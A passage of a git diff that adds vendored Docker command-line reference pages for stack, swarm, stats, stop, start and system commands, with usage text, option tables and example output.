nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## Related information + +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md new file mode 100644 index 0000000000..05c7215492 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md @@ -0,0 +1,47 @@ +--- +title: "stack ls" +description: "The stack ls command description and usage" +keywords: "stack, ls" +--- + + + +# stack ls + +```markdown +Usage: docker stack ls + +List stacks + +Aliases: + ls, list + +Options: + --help Print usage +``` + +Lists the stacks. + +For example, the following command shows all stacks and some additional information: + +```bash +$ docker stack ls + +ID SERVICES +vossibility-stack 6 +myapp 2 +``` + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md new file mode 100644 index 0000000000..101e9feb11 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md @@ -0,0 +1,51 @@ +--- +title: "stack ps" +description: "The stack ps command description and usage" +keywords: "stack, ps" +--- + + + +# stack ps + +```markdown +Usage: docker stack ps [OPTIONS] STACK + +List the tasks in the stack + +Options: + -f, --filter filter Filter output based on conditions provided + --help Print usage + --no-resolve Do not map IDs to Names + --no-trunc Do not truncate output +``` + +Lists the tasks that are running as part of the specified stack. This +command has to be run targeting a manager node. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. + +The currently supported filters are: + +* id +* name +* desired-state + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md new file mode 100644 index 0000000000..fd639978ec --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md @@ -0,0 +1,38 @@ +--- +title: "stack rm" +description: "The stack rm command description and usage" +keywords: "stack, rm, remove, down" +--- + + + +# stack rm + +```markdown +Usage: docker stack rm STACK + +Remove the stack + +Aliases: + rm, remove, down + +Options: + --help Print usage +``` + +Remove the stack from the swarm. This command has to be run targeting +a manager node. + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md new file mode 100644 index 0000000000..62779b4aa1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md @@ -0,0 +1,70 @@ +--- +title: "stack services" +description: "The stack services command description and usage" +keywords: "stack, services" +advisory: "experimental" +--- + + + +# stack services (experimental) + +```markdown +Usage: docker stack services [OPTIONS] STACK + +List the services in the stack + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + -q, --quiet Only display IDs +``` + +Lists the services that are running as part of the specified stack. This +command has to be run targeting a manager node. + +For example, the following command shows all services in the `myapp` stack: + +```bash +$ docker stack services myapp + +ID NAME REPLICAS IMAGE COMMAND +7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f +dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. + +The following command shows both the `web` and `db` services: + +```bash +$ docker stack services --filter name=myapp_web --filter name=myapp_db myapp + +ID NAME REPLICAS IMAGE COMMAND +7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f +dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 +``` + +The currently supported filters are: + +* id / ID (`--filter id=7be5ei6sqeye`, or `--filter ID=7be5ei6sqeye`) +* name (`--filter name=myapp_web`) +* label (`--filter label=key=value`) + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/start.md b/vendor/github.com/docker/docker/docs/reference/commandline/start.md new file mode 100644 index 0000000000..980bce9585 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/start.md @@ -0,0 +1,28 @@ +--- +title: "start" +description: "The start command description and usage" +keywords: "Start, container, stopped" +--- + + + +# start + +```markdown +Usage: docker start [OPTIONS] CONTAINER [CONTAINER...] + +Start one or more stopped containers + +Options: + -a, --attach Attach STDOUT/STDERR and forward signals + --detach-keys string Override the key sequence for detaching a container + --help Print usage + -i, --interactive Attach container's STDIN +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md new file mode 100644 index 0000000000..f5d0d54f35 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md @@ -0,0 +1,117 @@ +--- +title: "stats" +description: "The stats command description and usage" +keywords: "container, resource, statistics" +--- + + + +# stats + +```markdown +Usage: docker stats [OPTIONS] [CONTAINER...] + +Display a live stream of container(s) resource usage statistics + +Options: + -a, --all Show all containers (default shows just running) + --format string Pretty-print images using a Go template + --help Print usage + --no-stream Disable streaming stats and only pull the first result +``` + +The `docker stats` command returns a live data stream for running containers. To limit data to one or more specific containers, specify a list of container names or ids separated by a space. You can specify a stopped container but stopped containers do not return any data. + +If you want more detailed information about a container's resource usage, use the `/containers/(id)/stats` API endpoint. + +## Examples + +Running `docker stats` on all running containers against a Linux daemon. + + $ docker stats + CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O + 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB + 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B + d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B + +Running `docker stats` on multiple containers by name and id against a Linux daemon. + + $ docker stats fervent_panini 5acfcb1b4fd1 + CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O + 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B + fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B + +Running `docker stats` on all running containers against a Windows daemon. + + PS E:\> docker stats + CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O + 09d3bb5b1604 6.61% 38.21 MiB 17.1 kB / 7.73 kB 10.7 MB / 3.57 MB + 9db7aa4d986d 9.19% 38.26 MiB 15.2 kB / 7.65 kB 10.6 MB / 3.3 MB + 3f214c61ad1d 0.00% 28.64 MiB 64 kB / 6.84 kB 4.42 MB / 6.93 MB + +Running `docker stats` on multiple containers by name and id against a Windows daemon. + + PS E:\> docker ps -a + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + 3f214c61ad1d nanoserver "cmd" 2 minutes ago Up 2 minutes big_minsky + 9db7aa4d986d windowsservercore "cmd" 2 minutes ago Up 2 minutes mad_wilson + 09d3bb5b1604 windowsservercore "cmd" 2 minutes ago Up 2 minutes affectionate_easley + + PS E:\> docker stats 3f214c61ad1d mad_wilson + CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O + 3f214c61ad1d 0.00% 46.25 MiB 76.3 kB / 7.92 kB 10.3 MB / 14.7 MB + mad_wilson 9.59% 40.09 MiB 27.6 kB / 8.81 kB 17 MB / 20.1 MB + +## Formatting + +The formatting option (`--format`) pretty prints container output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +------------ | -------------------------------------------- +`.Container` | Container name or ID (user input) +`.Name` | Container name +`.ID` | Container ID +`.CPUPerc` | CPU percentage +`.MemUsage` | Memory usage +`.NetIO` | Network IO +`.BlockIO` | Block IO +`.MemPerc` | Memory percentage (Not available on Windows) +`.PIDs` | Number of PIDs (Not available on Windows) + + +When using the `--format` option, the `stats` command either +outputs the data exactly as the template declares or, when using the +`table` directive, includes column headers as well. + +The following example uses a template without headers and outputs the +`Container` and `CPUPerc` entries separated by a colon for all images: + +```bash +$ docker stats --format "{{.Container}}: {{.CPUPerc}}" + +09d3bb5b1604: 6.61% +9db7aa4d986d: 9.19% +3f214c61ad1d: 0.00% +``` + +To list all containers statistics with their name, CPU percentage and memory +usage in a table format you can use: + +```bash +$ docker stats --format "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}" + +CONTAINER CPU % PRIV WORKING SET +1285939c1fd3 0.07% 796 KiB / 64 MiB +9c76f7834ae2 0.07% 2.746 MiB / 64 MiB +d1ea048f04e4 0.03% 4.583 MiB / 64 MiB +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md new file mode 100644 index 0000000000..3090db98ae --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md @@ -0,0 +1,29 @@ +--- +title: "stop" +description: "The stop command description and usage" +keywords: "stop, SIGKILL, SIGTERM" +--- + + + +# stop + +```markdown +Usage: docker stop [OPTIONS] CONTAINER [CONTAINER...] + +Stop one or more running containers + +Options: + --help Print usage + -t, --time int Seconds to wait for stop before killing it (default 10) +``` + +The main process inside the container will receive `SIGTERM`, and after a grace +period, `SIGKILL`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md new file mode 100644 index 0000000000..44afc27476 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md @@ -0,0 +1,142 @@ +--- +title: "swarm init" +description: "The swarm init command description and usage" +keywords: "swarm, init" +--- + + + +# swarm init + +```markdown +Usage: docker swarm init [OPTIONS] + +Initialize a swarm + +Options: + --advertise-addr string Advertised address (format: [:port]) + --autolock Enable manager autolocking (requiring an unlock key to start a stopped manager) + --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) + --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) + --external-ca external-ca Specifications of one or more certificate signing endpoints + --force-new-cluster Force create a new cluster from current state + --help Print usage + --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) + --max-snapshots uint Number of additional Raft snapshots to retain + --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) + --task-history-limit int Task history retention limit (default 5) +``` + +Initialize a swarm. The docker engine targeted by this command becomes a manager +in the newly created single-node swarm. + + +```bash +$ docker swarm init --advertise-addr 192.168.99.121 +Swarm initialized: current node (bvz81updecsj6wjz393c09vti) is now a manager. + +To add a worker to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ + 172.17.0.2:2377 + +To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions. +``` + +`docker swarm init` generates two random tokens, a worker token and a manager token. When you join +a new node to the swarm, the node joins as a worker or manager node based upon the token you pass +to [swarm join](swarm_join.md). + +After you create the swarm, you can display or rotate the token using +[swarm join-token](swarm_join_token.md). + +### `--autolock` + +This flag enables automatic locking of managers with an encryption key. The +private keys and data stored by all managers will be protected by the +encryption key printed in the output, and will not be accessible without it. +Thus, it is very important to store this key in order to activate a manager +after it restarts. The key can be passed to `docker swarm unlock` to reactivate +the manager. Autolock can be disabled by running +`docker swarm update --autolock=false`. After disabling it, the encryption key +is no longer required to start the manager, and it will start up on its own +without user intervention. + +### `--cert-expiry` + +This flag sets the validity period for node certificates. + +### `--dispatcher-heartbeat` + +This flag sets the frequency with which nodes are told to use as a +period to report their health. + +### `--external-ca` + +This flag sets up the swarm to use an external CA to issue node certificates. The value takes +the form `protocol=X,url=Y`. The value for `protocol` specifies what protocol should be used +to send signing requests to the external CA. Currently, the only supported value is `cfssl`. +The URL specifies the endpoint where signing requests should be submitted. + +### `--force-new-cluster` + +This flag forces an existing node that was part of a quorum that was lost to restart as a single node Manager without losing its data. + +### `--listen-addr` + +The node listens for inbound swarm manager traffic on this address. The default is to listen on +0.0.0.0:2377. It is also possible to specify a network interface to listen on that interface's +address; for example `--listen-addr eth0:2377`. + +Specifying a port is optional. If the value is a bare IP address or interface +name, the default port 2377 will be used. + +### `--advertise-addr` + +This flag specifies the address that will be advertised to other members of the +swarm for API access and overlay networking. If unspecified, Docker will check +if the system has a single IP address, and use that IP address with the +listening port (see `--listen-addr`). If the system has multiple IP addresses, +`--advertise-addr` must be specified so that the correct address is chosen for +inter-manager communication and overlay networking. + +It is also possible to specify a network interface to advertise that interface's address; +for example `--advertise-addr eth0:2377`. + +Specifying a port is optional. If the value is a bare IP address or interface +name, the default port 2377 will be used. + +### `--task-history-limit` + +This flag sets up task history retention limit. + +### `--max-snapshots` + +This flag sets the number of old Raft snapshots to retain in addition to the +current Raft snapshots. By default, no old snapshots are retained. This option +may be used for debugging, or to store old snapshots of the swarm state for +disaster recovery purposes. + +### `--snapshot-interval` + +This flag specifies how many log entries to allow in between Raft snapshots. +Setting this to a higher number will trigger snapshots less frequently. +Snapshots compact the Raft log and allow for more efficient transfer of the +state to new managers. However, there is a performance cost to taking snapshots +frequently. + +## Related information + +* [swarm join](swarm_join.md) +* [swarm leave](swarm_leave.md) +* [swarm update](swarm_update.md) +* [swarm join-token](swarm_join_token.md) +* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md new file mode 100644 index 0000000000..0cde0d7bcd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md @@ -0,0 +1,102 @@ +--- +title: "swarm join" +description: "The swarm join command description and usage" +keywords: "swarm, join" +--- + + + +# swarm join + +```markdown +Usage: docker swarm join [OPTIONS] HOST:PORT + +Join a swarm as a node and/or manager + +Options: + --advertise-addr string Advertised address (format: [:port]) + --help Print usage + --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) + --token string Token for entry into the swarm +``` + +Join a node to a swarm. The node joins as a manager node or worker node based upon the token you +pass with the `--token` flag. If you pass a manager token, the node joins as a manager. If you +pass a worker token, the node joins as a worker. + +### Join a node to swarm as a manager + +The example below demonstrates joining a manager node using a manager token. + +```bash +$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 192.168.99.121:2377 +This node joined a swarm as a manager. +$ docker node ls +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +dkp8vy1dq1kxleu9g4u78tlag * manager2 Ready Active Reachable +dvfxp4zseq4s0rih1selh0d20 manager1 Ready Active Leader +``` + +A cluster should only have 3-7 managers at most, because a majority of managers must be available +for the cluster to function. Nodes that aren't meant to participate in this management quorum +should join as workers instead. Managers should be stable hosts that have static IP addresses. + +### Join a node to swarm as a worker + +The example below demonstrates joining a worker node using a worker token. + +```bash +$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx 192.168.99.121:2377 +This node joined a swarm as a worker. +$ docker node ls +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active +dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active Reachable +dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader +``` + +### `--listen-addr value` + +If the node is a manager, it will listen for inbound swarm manager traffic on this +address. The default is to listen on 0.0.0.0:2377. It is also possible to specify a +network interface to listen on that interface's address; for example `--listen-addr eth0:2377`. + +Specifying a port is optional. If the value is a bare IP address, or interface +name, the default port 2377 will be used. + +This flag is generally not necessary when joining an existing swarm. + +### `--advertise-addr value` + +This flag specifies the address that will be advertised to other members of the +swarm for API access. If unspecified, Docker will check if the system has a +single IP address, and use that IP address with the listening port (see +`--listen-addr`). If the system has multiple IP addresses, `--advertise-addr` +must be specified so that the correct address is chosen for inter-manager +communication and overlay networking. + +It is also possible to specify a network interface to advertise that interface's address; +for example `--advertise-addr eth0:2377`. + +Specifying a port is optional. If the value is a bare IP address, or interface +name, the default port 2377 will be used. + +This flag is generally not necessary when joining an existing swarm. + +### `--token string` + +Secret value required for nodes to join the swarm + + +## Related information + +* [swarm init](swarm_init.md) +* [swarm leave](swarm_leave.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md new file mode 100644 index 0000000000..d731f028ba --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md @@ -0,0 +1,105 @@ +--- +title: "swarm join-token" +description: "The swarm join-token command description and usage" +keywords: "swarm, join-token" +--- + + + +# swarm join-token + +```markdown +Usage: docker swarm join-token [OPTIONS] (worker|manager) + +Manage join tokens + +Options: + --help Print usage + -q, --quiet Only display token + --rotate Rotate join token +``` + +Join tokens are secrets that allow a node to join the swarm. There are two +different join tokens available, one for the worker role and one for the manager +role. You pass the token using the `--token` flag when you run +[swarm join](swarm_join.md). Nodes use the join token only when they join the +swarm. + +You can view or rotate the join tokens using `swarm join-token`. + +As a convenience, you can pass `worker` or `manager` as an argument to +`join-token` to print the full `docker swarm join` command to join a new node to +the swarm: + +```bash +$ docker swarm join-token worker +To add a worker to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ + 172.17.0.2:2377 + +$ docker swarm join-token manager +To add a manager to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 \ + 172.17.0.2:2377 +``` + +Use the `--rotate` flag to generate a new join token for the specified role: + +```bash +$ docker swarm join-token --rotate worker +Successfully rotated worker join token. + +To add a worker to this swarm, run the following command: + + docker swarm join \ + --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t \ + 172.17.0.2:2377 +``` + +After using `--rotate`, only the new token will be valid for joining with the specified role. + +The `-q` (or `--quiet`) flag only prints the token: + +```bash +$ docker swarm join-token -q worker + +SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t +``` + +### `--rotate` + +Because tokens allow new nodes to join the swarm, you should keep them secret. +Be particularly careful with manager tokens since they allow new manager nodes +to join the swarm. A rogue manager has the potential to disrupt the operation of +your swarm. + +Rotate your swarm's join token if a token gets checked-in to version control, +stolen, or a node is compromised. You may also want to periodically rotate the +token to ensure any unknown token leaks do not allow a rogue node to join +the swarm. + +To rotate the join token and print the newly generated token, run +`docker swarm join-token --rotate` and pass the role: `manager` or `worker`. + +Rotating a join-token means that no new nodes will be able to join the swarm +using the old token. Rotation does not affect existing nodes in the swarm +because the join token is only used for authorizing new nodes joining the swarm. + +### `--quiet` + +Only print the token. Do not print a complete command for joining. + +## Related information + +* [swarm join](swarm_join.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md new file mode 100644 index 0000000000..c0d9437818 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md @@ -0,0 +1,58 @@ +--- +title: "swarm leave" +description: "The swarm leave command description and usage" +keywords: "swarm, leave" +--- + + + +# swarm leave + +```markdown +Usage: docker swarm leave [OPTIONS] + +Leave the swarm + +Options: + -f, --force Force this node to leave the swarm, ignoring warnings + --help Print usage +``` + +When you run this command on a worker, that worker leaves the swarm. + +You can use the `--force` option to on a manager to remove it from the swarm. +However, this does not reconfigure the swarm to ensure that there are enough +managers to maintain a quorum in the swarm. The safe way to remove a manager +from a swarm is to demote it to a worker and then direct it to leave the quorum +without using `--force`. Only use `--force` in situations where the swarm will +no longer be used after the manager leaves, such as in a single-node swarm. + +Consider the following swarm, as seen from the manager: +```bash +$ docker node ls +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active +dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active +dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader +``` + +To remove `worker2`, issue the following command from `worker2` itself: +```bash +$ docker swarm leave +Node left the default swarm. +``` +To remove an inactive node, use the [`node rm`](node_rm.md) command instead. + +## Related information + +* [node rm](node_rm.md) +* [swarm init](swarm_init.md) +* [swarm join](swarm_join.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md new file mode 100644 index 0000000000..164b7d35a4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md @@ -0,0 +1,41 @@ +--- +title: "swarm unlock" +description: "The swarm unlock command description and usage" +keywords: "swarm, unlock" +--- + + + +# swarm unlock + +```markdown +Usage: docker swarm unlock + +Unlock swarm + +Options: + --help Print usage +``` + +Unlocks a locked manager using a user-supplied unlock key. This command must be +used to reactivate a manager after its Docker daemon restarts if the autolock +setting is turned on. The unlock key is printed at the time when autolock is +enabled, and is also available from the `docker swarm unlock-key` command. + + +```bash +$ docker swarm unlock +Please enter unlock key: +``` + +## Related information + +* [swarm init](swarm_init.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md new file mode 100644 index 0000000000..a2597fe9ab --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md @@ -0,0 +1,84 @@ +--- +title: "swarm unlock-key" +description: "The swarm unlock-keycommand description and usage" +keywords: "swarm, unlock-key" +--- + + + +# swarm unlock-key + +```markdown +Usage: docker swarm unlock-key [OPTIONS] + +Manage the unlock key + +Options: + --help Print usage + -q, --quiet Only display token + --rotate Rotate unlock key +``` + +An unlock key is a secret key needed to unlock a manager after its Docker daemon +restarts. These keys are only used when the autolock feature is enabled for the +swarm. + +You can view or rotate the unlock key using `swarm unlock-key`. To view the key, +run the `docker swarm unlock-key` command without any arguments: + + +```bash +$ docker swarm unlock-key +To unlock a swarm manager after it restarts, run the `docker swarm unlock` +command and provide the following key: + + SWMKEY-1-fySn8TY4w5lKcWcJPIpKufejh9hxx5KYwx6XZigx3Q4 + +Please remember to store this key in a password manager, since without it you +will not be able to restart the manager. +``` + +Use the `--rotate` flag to rotate the unlock key to a new, randomly-generated +key: + +```bash +$ docker swarm unlock-key --rotate +Successfully rotated manager unlock key. + +To unlock a swarm manager after it restarts, run the `docker swarm unlock` +command and provide the following key: + + SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 + +Please remember to store this key in a password manager, since without it you +will not be able to restart the manager. +``` + +The `-q` (or `--quiet`) flag only prints the key: + +```bash +$ docker swarm unlock-key -q +SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 +``` + +### `--rotate` + +This flag rotates the unlock key, replacing it with a new randomly-generated +key. The old unlock key will no longer be accepted. + +### `--quiet` + +Only print the unlock key, without instructions. + +## Related information + +* [swarm unlock](swarm_unlock.md) +* [swarm init](swarm_init.md) +* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md new file mode 100644 index 0000000000..0af63fe3e0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md @@ -0,0 +1,45 @@ +--- +title: "swarm update" +description: "The swarm update command description and usage" +keywords: "swarm, update" +--- + + + +# swarm update + +```markdown +Usage: docker swarm update [OPTIONS] + +Update the swarm + +Options: + --autolock Change manager autolocking setting (true|false) + --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) + --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) + --external-ca external-ca Specifications of one or more certificate signing endpoints + --help Print usage + --max-snapshots uint Number of additional Raft snapshots to retain + --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) + --task-history-limit int Task history retention limit (default 5) +``` + +Updates a swarm with new parameter values. This command must target a manager node. + + +```bash +$ docker swarm update --cert-expiry 720h +``` + +## Related information + +* [swarm init](swarm_init.md) +* [swarm join](swarm_join.md) +* [swarm leave](swarm_leave.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md new file mode 100644 index 0000000000..c6e8bbdc68 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md @@ -0,0 +1,76 @@ +--- +title: "system df" +description: "The system df command description and usage" +keywords: "system, data, usage, disk" +--- + + + +# system df + +```markdown +Usage: docker system df [OPTIONS] + +Show docker filesystem usage + +Options: + --help Print usage + -v, --verbose Show detailed information on space usage +``` + +The `docker system df` command displays information regarding the +amount of disk space used by the docker daemon. + +By default the command will just show a summary of the data used: +```bash +$ docker system df +TYPE TOTAL ACTIVE SIZE RECLAIMABLE +Images 5 2 16.43 MB 11.63 MB (70%) +Containers 2 0 212 B 212 B (100%) +Local Volumes 2 1 36 B 0 B (0%) +``` + +A more detailed view can be requested using the `-v, --verbose` flag: +```bash +$ docker system df -v +Images space usage: + +REPOSITORY TAG IMAGE ID CREATED SIZE SHARED SIZE UNIQUE SIZE CONTAINERS +my-curl latest b2789dd875bf 6 minutes ago 11 MB 11 MB 5 B 0 +my-jq latest ae67841be6d0 6 minutes ago 9.623 MB 8.991 MB 632.1 kB 0 + a0971c4015c1 6 minutes ago 11 MB 11 MB 0 B 0 +alpine latest 4e38e38c8ce0 9 weeks ago 4.799 MB 0 B 4.799 MB 1 +alpine 3.3 47cf20d8c26c 9 weeks ago 4.797 MB 4.797 MB 0 B 1 + +Containers space usage: + +CONTAINER ID IMAGE COMMAND LOCAL VOLUMES SIZE CREATED STATUS NAMES +4a7f7eebae0f alpine:latest "sh" 1 0 B 16 minutes ago Exited (0) 5 minutes ago hopeful_yalow +f98f9c2aa1ea alpine:3.3 "sh" 1 212 B 16 minutes ago Exited (0) 48 seconds ago anon-vol + +Local Volumes space usage: + +NAME LINKS SIZE +07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e 2 36 B +my-named-vol 0 0 B +``` + +* `SHARED SIZE` is the amount of space that an image shares with another one (i.e. their common data) +* `UNIQUE SIZE` is the amount of space that is only used by a given image +* `SIZE` is the virtual size of the image, it is the sum of `SHARED SIZE` and `UNIQUE SIZE` + +Note that network information is not shown because it doesn't consume the disk space. + +## Related Information +* [system prune](system_prune.md) +* [container prune](container_prune.md) +* [volume prune](volume_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md new file mode 100644 index 0000000000..46f8c4364a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md @@ -0,0 +1,79 @@ +--- +title: "system prune" +description: "Remove unused data" +keywords: "system, prune, delete, remove" +--- + + + +# system prune + +```markdown +Usage: docker system prune [OPTIONS] + +Delete unused data + +Options: + -a, --all Remove all unused data not just dangling ones + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all unused containers, volumes, networks and images (both dangling and unreferenced). + +Example output: + +```bash +$ docker system prune -a +WARNING! This will remove: + - all stopped containers + - all volumes not used by at least one container + - all networks not used by at least one container + - all images without at least one container associated to them +Are you sure you want to continue? [y/N] y 